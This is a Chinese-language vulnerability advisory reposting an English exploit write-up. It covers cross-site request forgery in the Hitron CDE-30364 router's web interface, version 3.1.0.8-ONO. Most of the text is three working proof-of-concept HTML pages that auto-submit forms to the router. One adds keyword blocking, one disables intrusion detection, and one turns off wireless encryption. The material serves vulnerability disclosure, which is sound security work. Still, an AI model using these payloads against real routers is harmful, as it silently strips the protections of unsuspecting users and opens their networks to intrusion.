Hitron CDE-30364路由器跨站请求伪造漏洞

文章由LinuxBoy分享于2019-04-02 03:04:48热评（98）

Hitron CDE-30364路由器跨站请求伪造漏洞

发布日期：2013-09-27
更新日期：2013-10-01

受影响系统：
ono Hitron Technologies CDE-30364 3.1.0.8-ONO
描述：
--------------------------------------------------------------------------------
Hitron CDE-30364 Router是通过Web管理界面设置和更改设备参数的ONO路由器。

Hitron CDE-30364 Router 3.1.0.8版本，TCP/IP端口80上的Web界面存在CSRF漏洞，可导致更改路由器参数。该adsl路由器的默认IP地址是192.168.1.1。

<*来源：Matias Mingorance Svensson
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability
# Date: 14-9-2013
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org
# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
# Tested on: Hitron Technologies CDE-30364
# Version HW: 1A
# Version SW: 3.1.0.8-ONO

-----------------------------------------------------------------------------------------
Introduction:
-----------------------------------------------------------------------------------------
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web
management interface in order to set and change device parameters.

The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port
80) is prone to CSRF vulnerabilities which allows to change router
parameters and to perform many modifications to the router's parameters.
The default ip adress of this adsl router, used for management purpose, is
192.168.1.1.

-----------------------------------------------------------------------------------------
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL
blocking(google in this case)
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-2: Enable/Disable Intrusion Detection System
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-3: Disable(None) Wireless Security Mode
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>

-----------------------------------------------------------------------------------------
Many other changes can be performed.

--
Un saludo,
Mat�as Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms

建议：
--------------------------------------------------------------------------------
厂商补丁：

ono
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/

推荐文章：

Hitron CDE-30364路由器跨站请求伪造漏洞